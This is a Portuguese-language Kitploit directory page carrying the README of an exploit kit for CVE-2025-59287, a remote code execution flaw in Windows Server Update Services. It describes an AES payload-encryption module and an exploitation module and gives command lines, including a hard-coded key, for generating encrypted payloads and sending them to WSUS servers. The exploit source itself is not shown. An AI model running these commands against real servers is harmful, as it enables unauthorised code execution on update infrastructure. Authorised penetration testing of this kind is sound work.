Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-59287 — Kit de exploração para CVE-2025-59287, uma vulnerabilidade de RCE em WSUS, com criptografia de payload AES e uma cadeia de exploração completa para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/adel-hx0d/cve-2025-59287
Ferramentas de Criptografia/DescriptografiaGeração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e Educação
GitHubadel-hx0d/cve-2025-59287

cve-2025-59287

Kit de exploração para CVE-2025-59287, uma vulnerabilidade de RCE em WSUS, com criptografia de payload AES e uma cadeia de exploração completa para testes de penetração autorizados.

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59287 - Kit de Exploração WSUS

por adel-h4x0a

⚠️ Apenas para Fins Educacionais e Testes Autorizados ⚠️

Visão Geral

Este kit de ferramentas demonstra a exploração da CVE-2025-59287, uma vulnerabilidade de execução remota de código no Windows Server Update Services (WSUS).

Componentes

  1. Módulo de Criptografia (cve-2025-59287-encr.py)

· Criptografia de payload AES para comunicação WSUS · Suporte para modos de criptografia legado e segura · Geração de payload personalizada

  1. Módulo de Exploração (cve-2025-59287-exp.py)

· Cadeia de exploração completa para CVE-2025-59287 · Tratamento robusto de erros e lógica de repetição · Suporte a payload personalizado

Estrutura

root@kitploit:~
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py      # Encryption module
├── 📄 cve-2025-59287-exp.py       # Exploitation module
├── 📄 requirements.txt            # Dependencies
└── 📄 README.md                   # This file

Uso

Pré-requisitos

root@kitploit:~
pip install -r requirements.txt

Criptografia

root@kitploit:~
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy

# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"

# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt

Exploração

root@kitploit:~
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530

# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt

# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5

Opções

Módulo de Criptografia (cve-2025-59287-encr.py)

· --key: Chave AES em formato hexadecimal (opcional) · --command: Comando a executar (padrão: calc) · --mode: Modo de criptografia [legacy, secure] (padrão: legacy) · --output: Arquivo de saída para salvar o payload (opcional)

Módulo de Exploração (cve-2025-59287-exp.py)

· target: URL do servidor WSUS (obrigatório) · --payload: Arquivo de payload base64 personalizado (opcional) · --timeout: Tempo limite de requisição em segundos (padrão: 30) · --retries: Número de tentativas de repetição (padrão: 3) · --no-banner: Suprimir exibição do banner (opcional)

Exemplo Completo

root@kitploit:~
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt

# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt

Aviso Legal

❗ Aviso Importante:

Esta ferramenta é fornecida apenas para fins educacionais e testes de penetração autorizados. O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.

Esta ferramenta deve ser usada apenas em:

· Ambientes de teste que você possui · Sistemas para os quais você obteve permissão por escrito para testar · Fins educacionais e acadêmicos

O desenvolvedor não se responsabiliza por qualquer uso ilegal ou não autorizado desta ferramenta.

Licença

Este projeto está licenciado sob a Licença MIT.

Atualizações

· v1.0: Lançamento inicial com suporte completo de exploração · v1.1: Tratamento de erros aprimorado e melhorias de registro

Contribuição

Relatórios de bugs e pull requests são incentivados para melhorar a ferramenta dentro do quadro de uso responsável e ético.


Nota: Sempre obtenha permissão por escrito antes de testar qualquer sistema. A conscientização em segurança começa com responsabilidade. 🔒

Baixar ferramenta